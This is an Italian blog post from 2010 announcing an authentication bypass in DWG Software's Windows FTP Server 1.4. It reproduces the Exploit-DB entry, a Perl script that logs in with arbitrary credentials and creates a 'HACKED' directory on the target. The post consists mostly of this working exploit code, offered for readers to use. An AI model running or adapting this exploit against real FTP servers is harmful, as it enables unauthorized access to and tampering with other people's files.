Il software Windows FTP Server è affetto di un exploit rilasciato ieri oggi 09/04/2010 che permette l’accesso al FTP senza alcuna credenziale Username e Password.

Il ricercatore Chap0 ha pertanto trovato la vurnerabilità che è stata rilasciata tramite Exploit-DB e potete trovarala dopo il salto!

</p>
<p># Exploit Title: WINDOWS FTP SERVER by DWG (Auth Bypass)<br />
# Date: April 09, 2010<br />
# Software Link: [http://www.windowsftpserver.com/free_download.html]<br />
# Version: v 1.4<br />
# Tested on: Windows XP SP3<br />
# Author: chap0<br />
# Email: chap0x90[at]gmail[dot]com<br />
# Site: [www.setfreesecurity.com]<br />
#<br />
# Windows FTP Server by DWG Software is vulnerable to<br />
# authentication-bypass that will allow attackers to<br />
# connect with any username and password.<br />
# This give attackers full access to the Top Level<br />
# directory of the ftp server.<br />
#<br />
# Greetz and many thanks to all Exploit-DBers and GOD gets the Glory<br />
#<br />
#<br />
#!/usr/bin/perl</p>
<p>use IO::Socket;</p>
<p>$luser = &quot;evil&quot;;<br />
$pass = &quot;hacker&quot;;</p>
<p>$mysock = IO::Socket::INET-&gt;new(PeerAddr =&gt;'192.168.2.6', PeerPort =&gt; '21', Proto =&gt; 'tcp');</p>
<p>print &quot;Connecting with a bad credentials. . .\n&quot;;<br />
sleep(1);</p>
<p>print $mysock &quot;USER $luser\r\n&quot;;<br />
print $mysock &quot;PASS $pass\r\n&quot;;</p>
<p>print &quot;Making HACKED folder . . .\n&quot;;<br />
sleep(2);</p>
<p>print $mysock &quot;MKD HACKED\r\n&quot;;</p>
<p>print &quot;DONE . . .\n&quot;;<br />
sleep(1);</p>
<p>